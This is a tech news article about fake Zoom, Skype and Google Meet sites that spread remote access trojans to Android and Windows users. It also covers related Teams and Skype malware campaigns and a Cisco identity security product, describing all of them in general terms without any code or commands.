Bad actors are using fake Zoom, Microsoft’s Skype and Google Meet websites to distribute malware.
As discovered by Zscaler ThreatLabz researchers, threat actors have been impersonating video conferencing brands to spread various malware targeting both Android and Windows users since December 2023.
The spoofed sites, designed in Russian and hosted on URLs eerily similar to their legitimate versions, suggest that attackers are employing “typosquatting” tactics to entice potential victims into downloading malware — meaning some users might not notice the typo in the domain and so believe they will be on the legitimate website.
Zscaler ThreatLabz wrote:
The attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian(…) In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites.”
The websites offer options to download the app for Android, iOS, and Windows platforms. While choosing the iOS link doesn’t do anything malicious, selecting the button for Android downloads an APK file while clicking the Windows app button triggers the download of a batch script.
The batch script executes a PowerShell script, which downloads and runs one of several remote access trojans (RATs) identified in the campaign: Spynote RAT for Android, NjRAT, or DCRat for Windows.
“The threat actor is distributing RATs, including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems,” Zscaler added. “A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files.”
The RATs serve a range of malicious intentions, such as extracting files, stealing sensitive information, and also logging keystrokes.
Businesses Prioritising Security in 2024
The emerging security challenges prompted by the rise of hybrid working, as well as the growing sophistication of bad actor technologies and tactics, have resulted in several alarming stories.
Over the winter holidays, Microsoft had to disable a significant software tool to prevent malware attacks, while Teams was also being exploited for malware phishing.
The tech giant disabled the ms-appinstaller protocol handler as the default after discovering evidence of hackers exploiting the software to distribute malware. Microsoft indicated that hackers might have chosen this vector because it could bypass security mechanisms like Microsoft Defender SmartScreen and native browser warnings for executable file downloads, posing a significant threat to user safety.
Both Teams and Skype were also targeted in previous attacks in autumn, with compromised Skype accounts being hacked to spread the DarkGate malware.
As reported by Trend Micro, multiple Skype business accounts were compromised and then used as an environment to distribute a VBA loader script attachment. It is unconfirmed how the Skype accounts became compromised, but Trend Micro suggested that it was “either through leaked credentials available through underground forums or the previous compromise of the parent organisation”.
Skype wasn’t the sole target of the hackers; Teams was also compromised. The attackers sought to breach Teams accounts of organizations with configurations allowing messages from external users.
These types of developments over the past few months have seen vendors strengthening their security offerings. Cisco, for example, revealed a “first-of-its-kind” Identity Intelligence solution last month. The service resides within the Cisco Security Cloud and is compounded by multiple new AI-powered security capabilities.
Cisco Identity Intelligence improves customers’ existing identity infrastructure by providing unified visibility and AI-driven analytics. It allows users to gain insights into their entire identity population, secure vulnerable accounts, revoke unused and risky privileges, identify behavioural anomalies, and prevent high-risk access attempts. Critically, this is achieved without the need to overhaul existing solutions, allowing a seamless integration process.
